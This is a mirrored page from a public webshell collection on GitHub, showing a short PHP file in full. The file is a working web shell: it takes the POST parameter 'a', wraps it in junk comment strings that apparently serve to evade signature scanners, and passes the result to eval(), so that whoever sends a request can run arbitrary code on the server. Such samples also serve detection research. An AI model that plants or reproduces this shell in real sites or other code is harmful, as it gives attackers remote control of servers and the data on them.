mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
11 lines
97 B
PHP
11 lines
97 B
PHP
<?php
|
|
|
|
function x()
|
|
{
|
|
|
|
return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
|
|
|
|
}
|
|
|
|
eval(x());
|
|
?>
|